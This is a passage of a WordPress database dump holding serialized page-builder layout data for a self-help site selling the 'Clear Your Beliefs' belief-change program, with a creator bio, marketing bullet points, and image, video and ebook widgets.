Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1022, 1524, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:344:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center>[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1027, 1529, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:531:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="margin-left: 45px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1024, 1526, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:567:"<div id="divStroke">\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
